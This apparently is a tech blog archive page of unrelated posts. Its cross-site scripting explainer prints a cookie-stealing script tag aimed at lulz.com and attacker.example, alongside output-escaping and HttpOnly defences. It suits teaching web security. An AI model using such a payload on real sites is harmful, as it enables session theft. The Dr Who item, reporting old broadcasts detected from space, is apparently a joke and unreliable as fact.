The Dark Arts: Anonymity

Love him or hate him, Edward Snowden knew a thing or two about anonymity. In June of 2013, he blew the whistle on the NSA’s out-of-control programs that can target virtually anyone plugged into the digital age. The former CIA employee was working as a contractor for the NSA, where he had access to highly classified documents for many of these general-populace surveillance programs. He eventually took off to Hong Kong and released the documents to a handful of reporters. One of these documents was a PowerPoint presentation in which the NSA complained about how the TAILS operating system was a major thorn in their side. Naturally, Snowden insisted that he and the reporters communicate only via the TAILS O/S. He used PGP, an encryption method with the highly sophisticated title of “Pretty Good Privacy”, and asked not to be quoted at length for fear of identification via stylometry.

In this article, we’re going to go over the basics of anonymity, and introduce you to methods of staying anonymous while online.


Printing Magnetic Fields

We told you about these “printable” magnets a while back. When you have the ability to squeeze many smaller magnets into a tiny spot and adjust their north/south orientations at will, you can not only control the strength of the overall magnetic field, you can construct new and seemingly physics-defying widgets. This article will not focus on the magnets themselves, but instead we’re going to peel away the closed source shroud that hides the inner workings of that nifty little printer of theirs. There has been a lot of talk about these printable magnets, but very little about how they’re made. This changes today. We’ll show you how this magnetic field printer works so you can get busy making your own.

History

Several years ago, a company called Correlated Magnetic Research introduced to the world the idea of a magnetic field printer with the Mini MagPrinter. It sold for a whopping $45,000, which limited it to businesses and well-funded universities. They eventually changed their company name to Polymagnet and now focus on making the magnets themselves. It appears, however, that they’ve refined their printer for a higher resolution. Skip to 2:45 in this video to see the Mini MagPrinter in action. Now skip to 7:25 in this video to see their next generation printer. Now let’s figure out how they work.

What We Know

(Image: Original Mini MagPrinter)

Firstly, you can toss your Kickstarter idea in the recycle bin because they hold several patents for their printer. But that doesn’t mean you can’t make one in your garage or for your hackerspace. Their machine might have cost $45k, but we’d be willing to bet a dozen Raspberry Pi Zeros that you could make one for two orders of magnitude less. But first we need to know how it works. Let’s look at the science first.

The Curie Point

The Curie Point is a temperature where a magnet loses its magnetic field. It is theorized that magnetism arises from the spin and angular momentum of electrons. If you get them lined up correctly, you get a magnet. When you heat the metal past the Curie Point, this alignment gets all messed up and you lose the magnetic properties. And, of course, you can align the atoms back up by introducing the metal to a strong magnetic field.

Halbach Array

A Halbach array is created when smaller magnets are arranged so that their magnetic fields add up in a particular direction and cancel out in another. The magnets made by the magnetic field printer can be considered Halbach arrays.

How It Works

Everything begins with a blank Neodymium magnet. We’re all familiar with CNC technology, so we’ll focus on the magnetic field printing head itself. Reading through the comments of the original article, many believe that it uses a combination of heating to exceed the Curie Point and a high strength electromagnet to “write” the magnetic field into the blank. However, after looking closely at this patent, it appears this is not the case. There is no heating involved. The printer head consists of “an inductor coil having multiple layers and a hole extending through the multiple layers” and works by “emitting from the inductor coil a magnetic field that magnetizes an area on a surface of the magnetizable material…”. In short, it’s just a strong, local magnetic field.

(Image: Left – Magnetic field print head. Right – Drawing of internal structure of the print head.)

Make Your Own

Now that you have a basic idea of how to print magnetic fields, you can start working on one of your own design. You already know how to make 3d printers and laser cutters. Just take one of these designs and replace the head with your custom-built magnetic printer head, whip up some software and bring this technology into the open source community. Blank Neodymium magnets and magnetic field viewing film are fairly cheap. First one to print the skull and wrenches logo gets a free t-shirt!

The Ultraviolet Catastrophe

As the light of the 20th century was peeking over the horizon, a young physicist by the name of Max Planck was taking to heart some career advice he had received while he attended Munich University in Germany. With the recent discovery of thermodynamics, there wasn’t much left in physics to know, or so his adviser thought. Hindsight is indeed 20/20.

It turns out that Planck was an expert at thermodynamics. Having mastered the subject gave him some leverage to use against a growing group of physicists known as atomists, who were using statistical models along with so-called ‘atoms’ to predict experimental outcomes. Atomists believed that matter was composed of discrete units. Planck believed the world was continuous and could not be divided into any type of discrete component. And he would draw the second law of thermodynamics from his holster and put this atom idea in the clay.


Dr Who Returns to Earth

While searching for signs of Dalek activity in the vast depths of outer space, the Arecibo Observatory in Puerto Rico stumbled across a most interesting find. They were receiving modulated radio signals emanating from an invisible object about 25 light years away. The signals were all in the VHF band between 41 and 68 MHz. After applying a little amplification and some wibbly wobbly timey wimey enhancements, it became clear what the signals were – 50 year old terrestrial television broadcasts. The site takes a minute or so to load due to the traffic it’s getting.

[Dr. Venn], the radio astronomer who discovered the signals, was able to talk NASA into pointing the Hubble Space Telescope in the direction of the now officially named “Bounce Anomaly”, but was unable to see anything. Meanwhile, a BBC team has been working with [Dr. Venn] to recover the 50 year old signals and is attempting to reconstruct entire broadcasts – some of which are the very first Dr. Who episodes.

Thanks to [PWalsh] for the tip.

The Dark Arts: Cross Site Scripting

In 2011, a group of hackers known as Lulzsec went on a two month rampage hacking into dozens of websites including those owned by FOX, PBS, the FBI, Sony and many others. The group was eventually caught and questioned about how they were able to pull off so many hacks. It would be revealed that none of the hackers actually knew each other in real life. They didn’t even know each other’s real names. They only spoke in secluded chat rooms tucked away in a dark corner of the internet and knew each other by their aliases – [tFlow], [Sabu], [Topiary], [Kayla], to name a few. Each had their own special skill, and when combined together they were a very effective team of hackers.

It was found that they used 3 primary methods of cracking into websites – SQL injection, cross-site scripting and remote file inclusion. We gave a basic overview of how a SQL injection attack works in the previous article of this series. In this article we’re going to do the same with cross-site scripting, or XSS for short. SQL injection has been called the biggest vulnerability in the history of mankind from a potential data loss perspective. Cross-site scripting comes in as a close second. Let’s take a look at how it works.

XSS Scenario

Let us suppose that you wanted to sell an Arduino on your favorite buy-and-sell auction website. The first thing to do would be to log into the server. During this process, a cookie from that server would be stored on your computer. Anytime you load the website in your browser, it will send that cookie along with your HTTP request to the server, letting it know that it was you and saving you from having to log in every time you visit. It is this cookie that will become the target of our attack.

You would then open up some type of window that would allow you to type in a description of your Arduino that potential buyers could read. Let’s imagine you say something like:

Arduino Uno in perfect condition. New in Box. $15 plus shipping.

You would save your description and it would be stored on a database in the server. So far, there is nothing out of the ordinary or suspicious about our scenario at all. But let’s take a look at what happens when a potential buyer logs into the server. They’re in need of an Arduino and see your ad that you just posted. What does their browser see when they load your post?

Arduino Uno in perfect condition. <b>New in Box</b>. $15 plus shipping.

Whether you realize it or not, you just ran HTML code (in the form of the bold tags) on their computer, albeit harmless code that does what both the buyer and seller want – to highlight a specific selling point of the product. But what other code can you run? Can you run code that might do something the buyer surely does not want? Code that will run on any and every computer that loads the post? Not only should you be able to see where we’re going with this, you should also be able to see the scope of the problem and just how dangerous it can be.

Now let us imagine a Lulzsec hacker is out scoping for some much needed lulz. He runs across your post and nearly instantly recognizes that you were able to run HTML code on his computer. He then makes a selling ad on the website:

Lot of 25 Raspberry Pi Zeros - New in Box - < script src="http://lulz.com/email_me_your_cookie.js" ></script> - $100, free shipping.

Now as soon as someone opens up the hacker’s ad, the script section will load up the malicious off-site code and steal the victim’s session cookie. Normally, only the website that set a cookie has access to that cookie. Here, although the script file comes from the hacker’s server, the script tag is part of a page served by the auction website, so the browser runs the code with the auction website’s privileges and lets it read the auction website’s cookie. Now the hacker can load the cookie into his browser to impersonate the victim, allowing the hacker access to everything his victim has access to.

Endless Opportunities

With a little imagination, you can see just how far you can reach with a cross-site scripting attack. You can envision a more targeted attack with a hacker trying to get inside a large company like Intel by exploiting a flawed competition entry process. The hacker visits the Intel Edison competition entry page and sees that he can run code in the application submission form. He knows someone on the Intel intranet will likely read his application and guesses it will be done via a browser. His XSS attack will run as soon as his entry is opened by the unsuspecting Intel employee.

This kind of attack can be mounted through any user input whose contents are later rendered, as code, in someone else’s browser. Take a comment box for instance. Type some kind of < script >evil</script> into a comment box and it will load on every computer that loads that page. [Samy Kamkar] used a similar technique to pull off his famous Myspace worm, as we talked about at the beginning of the previous article in this series. XSS, at one time, could even have been done with images.

Preventing XSS attacks

As with SQLi based attacks, almost all website developers in this day and age are aware of XSS and take active measures to prevent it. One prevention is validating input. Trying to run JavaScript in most applications where you should not be will not only give you an error, but will likely flag your account as being up to no good.


One thing you can do to protect yourself from such an attack is to use what is known as a sandboxed browser. This keeps code that runs in a browser in a “box” and keeps the rest of your computer safe. Most modern browsers have this technology built in. A more drastic step would be to disable JavaScript entirely from running on your computer.
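To make the scenario and the fix concrete, here is an added example that is not part of the original article: a tiny Node.js model of the auction site’s listing page. It renders the seller’s description two ways, pasted straight into the HTML (the vulnerable form) and HTML-escaped on output (the fix), and shows why only the first one hands the buyer’s browser a live script tag. It also models the HttpOnly cookie attribute, which matters for the sandbox point above: a browser sandbox isolates the browser from the rest of the machine, but it does not stop a script that the page itself loaded from reading that page’s cookie, whereas a cookie set with HttpOnly is never exposed to JavaScript at all. The listings, the script URL (attacker.example) and the Set-Cookie headers are constructed for this example.

```javascript
// Added example (not from the original article): stored XSS in an auction-site
// listing, and the output-encoding fix. Runs under Node.js with no dependencies.

// Sample listings as a seller (or an attacker) would type them. Constructed for
// this example; attacker.example is a placeholder host, not a real one.
const HARMLESS_AD = 'Arduino Uno in perfect condition. <b>New in Box</b>. $15 plus shipping.';
const MALICIOUS_AD =
  'Lot of 25 Raspberry Pi Zeros - New in Box - ' +
  '<script src="https://attacker.example/steal_cookie.js"></script> - $100, free shipping.';

// The vulnerable template: the description is pasted straight into the HTML,
// so whatever the seller typed, the buyer's browser parses as markup.
function renderListingUnsafe(description) {
  return `<div class="listing"><p>${description}</p></div>`;
}

// HTML-escape the five characters that can open or close markup or break out
// of an attribute. After this, the browser shows "<script>" as text instead
// of executing it.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The fixed template: identical, except the untrusted value is encoded for the
// HTML-body context it is inserted into.
function renderListingSafe(description) {
  return `<div class="listing"><p>${escapeHtml(description)}</p></div>`;
}

// Crude check for a page that contains a live <script> element. A real browser
// parser is far more forgiving than this regex; it is only here to make the
// difference between the two templates testable.
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Browser-side half of the defence: a cookie set with HttpOnly is withheld
// from document.cookie, so even an injected script cannot read it. This
// models that rule on a Set-Cookie header and returns what a script could see
// (null when HttpOnly is present).
function cookieReadableByScript(setCookieHeader) {
  const [nameValue, ...attrs] = setCookieHeader.split(';').map((p) => p.trim());
  const httpOnly = attrs.some((a) => a.toLowerCase() === 'httponly');
  return httpOnly ? null : nameValue;
}

function main() {
  for (const ad of [HARMLESS_AD, MALICIOUS_AD]) {
    const unsafe = renderListingUnsafe(ad);
    const safe = renderListingSafe(ad);
    console.log('unsafe:', unsafe, '\n  live script?', containsScriptElement(unsafe));
    console.log('safe:  ', safe, '\n  live script?', containsScriptElement(safe));
  }
  // Constructed Set-Cookie headers: the weak one is readable by any script on
  // the page, the strong one is not.
  const weak = 'session=abc123; Path=/';
  const strong = 'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';
  console.log('script sees weak cookie:  ', cookieReadableByScript(weak));
  console.log('script sees strong cookie:', cookieReadableByScript(strong));
}

main();
```

Note the trade-off the safe template makes: it also turns the seller’s harmless `<b>` into literal text. If a site wants to allow a little formatting, the right tool is an allow-list HTML sanitizer applied at output, not a blacklist of dangerous strings applied at input. Escaping is context-specific as well; a value inserted into a JavaScript string, a URL or an attribute needs a different encoding than the HTML-body one shown here.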

There are people here who are far more knowledgeable than I am on these types of hacking techniques. It was my hope to give the average hardware hacker a basic understanding of XSS and how it works. We welcome comments from those with a more advanced knowledge of cross-site scripting and other website hacking techniques that would help to deepen everyone’s understanding of these important subjects.

Source

XSS Flash animation 1

XSS Flash animation 2

Coleco Chameleon is a Kickstarter Scam

Retro gaming consoles exploded with the introduction of the Raspberry Pi and other similar single-board Linux computers. They all work the same way in that they emulate the original game console hardware with software. The game ROM is then dumped to a file and will play like the original. While this works just fine for the vast majority of us who want to get a dose of nostalgia as we chase the magic 1-up mushroom, gaming purists are not satisfied. They can tell the subtle differences between emulation and real hardware. And this is where our story begins.

Meet the Coleco Chameleon. What appears to be just another run-of-the-mill retro gaming console is not what you think. It has an FPGA core that replicates the actual hardware, to the delight of hardcore retro game enthusiasts around the world. To get it to the masses, they started an ambitious 2 million US dollar Indiegogo campaign, which has unfortunately come to a screeching halt.

Take a close look at the header image. That blue circuit board in there is nothing but an old PCI TV tuning card. To make matters worse, it also appears that their prototype system which was displayed at the Toy Fair in New York was just the guts of an SNES Jr stuffed into their shell.

This scam is clearly busted. However, the idea of reconstructing old gaming console hardware in an FPGA is a viable proposition, and there is demand for such a device from gaming enthusiasts. We can only hope that the owners of the Coleco Chameleon Kickstarter campaign meant well and slipped up trying to meet demand. If they can make a real piece of hardware, it would be welcomed.

The Dark Arts: SQL Injection and Secure Passwords

As the year of 2005 was drawing to a close, a website known as Myspace was basking in popularity. With millions of users, the site was the most popular social networking site in the world. It was unique in that it let users use HTML code to customize their Myspace page. Most of us, c’mon…admit it….had a Myspace page. The coding part was fun! But not everything was changeable with code. You could only upload up to 12 images and the Relationship Status drop-down menu only had a few options to choose from. These limitations did not sit well with [Samy Kamkar], a 19 year old hacker out of Los Angeles.


It didn’t take [Samy] long to figure out how to trick the site to let him upload more images and change his relationship status to a customized “in a hot relationship”. After hoodwinking the Myspace site with some simple hacks, he realized he could do just about anything he wanted to with it. And this is where things get interesting. It took just over a week to develop a script that would force people who visited his page to add him as a friend. But that wasn’t enough. He then programmed the script to copy itself onto the visitor’s page. [Samy] had developed a self-propagating worm.

The script went live as [Samy] went to bed. He woke up the next morning with 200 friend requests. An hour later the number had doubled. [Samy] got worried and sent an anonymous email to the webmaster warning of the worm. It was ignored. By 1:30PM that day, he had over 6,000 friend requests. And like any good hacker worth his weight in floppy drives, his sense of humor had him program the script to also add his name to each visitor’s Heroes List. This angered many people, who deleted him from their page, only to get reinfected moments later when they visited another (infected) page.

[Samy’s] script was raging out of control. As the evening closed in, his friends count had reached 919,664. It would top the 1 million mark just before Myspace took their servers offline to figure out what was going on. Two hours later, the site was back up. [Samy’s] profile page had been deleted.

[Samy] had used a technique known as cross-site scripting (XSS) to pull off his hack. We’ll touch on XSS in a later article. For now, we’re going to stick to the basics – proper passwords and SQL Injection.
